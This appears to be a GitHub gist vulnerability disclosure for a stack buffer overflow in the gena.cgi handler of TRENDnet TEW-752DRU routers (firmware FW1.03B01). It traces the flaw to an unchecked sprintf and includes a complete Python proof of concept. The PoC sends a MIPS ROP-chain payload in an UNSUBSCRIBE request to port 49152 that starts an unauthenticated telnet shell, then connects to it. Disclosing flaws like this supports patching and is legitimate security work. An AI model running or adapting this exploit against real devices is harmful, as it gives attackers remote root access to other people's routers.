Skip to content

Instantly share code, notes, and snippets.

@XiaoCurry
Last active August 26, 2024 20:00
Show Gist options
  • Save XiaoCurry/204680035c1efffa27d14956820ad928 to your computer and use it in GitHub Desktop.
Save XiaoCurry/204680035c1efffa27d14956820ad928 to your computer and use it in GitHub Desktop.
CVE_TRENDnet_report

Information

Vendor of the products: TRENDnet

Vendor's website: http://www.trendnet.com.cn/

Reported by: Chen Xiao(2235254941@qq.com)

Affected products: TRENDnet TEW-752DRU Routers

Affected firmware version: FW1.03B01

Firmware download address: TRENDnet TEW-752DRU

Overview

In the TRENDnet TEW-752DRU FW1.03B01 series routers, there is a buffer overflow vulnerability due to the lack of length verification for the service field in gena.cgi. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /gena.cgi.

Vulnerability details

The function at address 0x40E9BC in the /htdocs/cgibin binary file does not check the length of the SID field in the sprintf function, which poses a risk of stack overflow.

1

It is evident that injecting malicious data into v2 or a1 can lead to a buffer overflow, which can be exploited for vulnerabilities or cause a denial of service. Here, v2 refers to HTTP_SID and a1 refers to service, which are all controllable.

The function at 0x40E9BC is called within the genacgi_main function.

2

Therefore, our request method must be UNSUBSCRIBE.

In the /etc/services/HTTP/httpsvcs.php file, it can be found that gena.cgi is related to UPnP services.

3

In the upnpsetup function within the /etc/services/HTTP/httpsvcs.php file, it is observed that data can be sent to UPnP via port 49152.

4

Poc

Send the following POST request to inject malicious command via the service field.

# python3
from pwn import *
from socket import *
from os import *
from time import *
context(os = 'linux', arch = 'mips')

libc_base = 0x2aaf8000

s = socket(AF_INET, SOCK_STREAM)

cmd = b'telnetd -l /bin/sh;'
payload = b'a'*462
payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += b'a'*4 # s2
payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
payload += b'a'*0x18 # padding
payload += cmd

msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"

s.connect((gethostbyname("192.168.10.1"), 49152))
s.send(msg)

sleep(1)
system("telnet 192.168.10.1 23")

Attack Demonstration

Remotely log in to the firmware.

5

The Telnet service on port 23 has been detected as active.

6

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment